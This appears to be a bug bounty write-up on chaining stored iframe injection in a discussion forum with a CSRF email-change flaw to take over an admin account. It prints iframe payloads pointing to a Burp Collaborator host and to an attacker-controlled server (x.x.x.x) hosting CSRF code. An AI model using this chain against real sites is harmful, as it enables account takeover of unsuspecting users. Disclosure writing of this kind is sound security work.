Stored Iframe Injection + CSRF = Account Takeover 😎😎

Before we Start lets Clear some Questions

1. What is Iframe Injection.

Frame injection is a type of code injection vulnerability where attacker can injection frames which contains links to malicious websites or advertisements links. To know more about Iframe Injection you can click here.

2. After Injecting the Iframe in page, who actually calls the Iframe [ Client’s Browser or server].

Iframes that are injected into web pages are mostly called by Client’s Browser except in some cases like PDF generators. To check who is calling the injected frame you can inject an frame which source of Burp Collaborator like [<iframe src=xxxxxx.burpcollaborator.net></iframe> ], and checking the logs of Burp Collaborator will reveal the caller of Frame.😮😮

3.What is Cross Site Request Forgery ( CSRF).

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. To learn more about CSRF you can visit PortSwigger.

So Lets get Started

When you start to hunt on particular domain , the best thing to do first is to take a look at all the features of the domain and take a note of that. Understanding the flow of a particular website will help you to chain attacks and logically break it. It was a private Program so lets consider the site ABC.com

After looking at all the features i got to know that there is an Discussion Forum where all the members of community can chat with each others.

Here you can start a topic and discuss it with your community members.

So i started to inject my payload on reply feature, which concluded that the reply section was vulnerable to HTML Injection but not to XSS. I tried to inject many XSS payloads but didn't succeeded.

So i tried to inject Iframe and BOOM! It was reflected. 😋 😋 So my next task was to increase the Impact of these vulnerability ,😮😮 so i started other features of the website too.

After some time i came across a section where i was able to change my email address .

The first think that came into my mind was to try CSRF attack . And the request to change the email looked like.

Which confirmed that Email change feature is vulnerable to CSRF attack .So i quickly generated HTML code.

But to perform an CSRF attack Victim must link on visit a particular link from where the request to change email will be sent. But these was not possible here because admin would not click on any malicious link . So i thought lets combine the CSRF with Iframe Injection which i found earlier .

So i started my AWS Server lets consider it has ip [x.x.x.x] and copied the CSRF code in index.html page.

After that i injected the iframe payload i.e <iframe src=http://x.x.x.x/index.html”></iframe> in discussion forum and it was GAME OVER for admin after viewing the discussion forum, because he’s email id was changed to attacker’s email id.

ATTACK SCENARIO:-

1. Attacker will inject iframe into Discussion Forum which contains the link of email change request.
2. After victim or admin visits the discussion forum their browser’s will load the iframe which will lead to send the email change request from victims machine.

Thank you for reading . 😊😊